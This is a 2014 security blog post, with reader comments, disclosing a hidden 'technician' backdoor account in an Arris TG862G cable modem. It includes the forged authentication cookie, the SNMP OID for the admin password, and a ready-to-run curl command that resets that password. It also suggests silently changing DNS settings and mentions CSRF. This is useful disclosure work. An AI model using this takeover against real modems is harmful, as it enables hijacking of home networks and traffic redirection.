Tuesday, September 23, 2014

Arris Cable Modem Backdoor - I'm a technician, trust me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -
Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.
Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):
Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9
 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:
{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
And after base64 decoding the "credential" value we get:
{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:
Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9
Which decodes to the following:
{"credential":"dGVjaG5pY2lhbjo="}
And finally:
{"credential":"technician:"} 
Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(




That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:


That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:


Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:
SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);
Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:
HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}
What about setting a new value? Surely that will not work....



That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:


This functionality can be wrapped up in the following curl command:
curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'
Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


13 comments:

  1. Ya this is really disappointing . I did a talk with a friend a couple years back at HOPE NYC documenting a lot of these insane vulnerabilities in the Arris devices and its very upsetting that two years later people are still finding the same type of issues. Check out http://www.forbes.com/sites/andygreenberg/2012/07/13/researchers-say-time-warner-cable-and-comcast-distribute-wifi-routers-lacking-the-most-rudimentary-security/ You may want to reach out to Andy and give him an update ;)

    ReplyDelete
  2. "-TS070563_092012_MODEL_862_GW"
    Modem hadn't been updated. since Sept 20, 2012

    Here's one that had, on March 21, 2014:
    Software Image Name:TS070659S_032114_MODEL_862_GW_CT

    ReplyDelete
  3. Interesting blog. This is one of my favorite blog also I want you to update more post like this. Thanks for sharing this article.
    Cable operators in Chennai

    ReplyDelete
  4. hahahahaha, amazing. Reminds me once I had a Qwest modem that came with a source code disc in the box.

    I'm using a TG862G, HW #5, TS070686H_081514_MODEL_862_GW
    Looks like an older FW version, but mine doesn't use cookies at all.
    It seems to be using an internal user memory, I'll play around with this exploit sometime anyways.

    I actually had to dig through the HTML to get the FW version, which they so kindly commented out of the software page. They managed to use JQuery and still make the UI look like garbage. Arris has so much background making modems, you'd think I could have some better features such as data statistics and a device list that's interactive and actually works (70% of the computers it's seen on my network show up as UNKNOWN).

    I'm thankful that it's somewhat useful(solid port forwarding, static IPs, white/black listing), but damn.

    ReplyDelete
  5. Hi, what version of burp suite is that?

    ReplyDelete
  6. Hi. I own Arris TG862G, TWC pushed their firmware on it, it seems much older than discussed here.
    Firmware Name: TS070563C_032913_MODEL_862_GW_TW_SIP_PC20 Firmware Build Time: Fri Mar 29 2013
    I got a permanent password to advanced page/technician. But I don't have URL http://192.168.100.1/cgi-bin/tech_support_cgi, it's 404 and as a result I don't know how to enable SSH. Can anyone help with this old firmware?

    ReplyDelete
  7. been in contact with cogeco as they make wide use of the arris modems been told they are secure due to all hacks " needing physical access to the modems" I'm not able to explain if this is wrong or not to them and was hoping someone might be able to assist me in the method to demonstrate if the modem is hackable without physical access

    ReplyDelete
  8. Your router has been compromised and your network connections are being routed through a malicious remote server. Avast informed me

    Getting hits from markmonitor in tcpview in sysinternalsuite. Using arris wbm760a docsis 3.0 . Inside command promt under ipconfig im not show any default gateway

    Im considering scrapping Os an prolly from torrents, have vpn now. but im infected computer cant find any viruses and malwarebytes isnt detecting anything either but i cant get into my router.

    ReplyDelete
  9. [System Process] 0 TCPV6 [2001:558:6015:1:61c3:51cc:54ee:80f7] 49933 mia07s25-in-x08.1e100.net https TIME_WAIT

    ReplyDelete
  10. Pretty nice post. I have in fact enjoyed reading your website posts. I have been googling blogs and sites in related manner recently and i have to state you have a nice
    Pass Box manufacturers

    ReplyDelete
  11. How can you tell if your Manufacturer ARRIS
    Model Number NVG599

    has be compromised or has had someone try to compromise it?
    rparkerfl1 at the aol place for DM

    ReplyDelete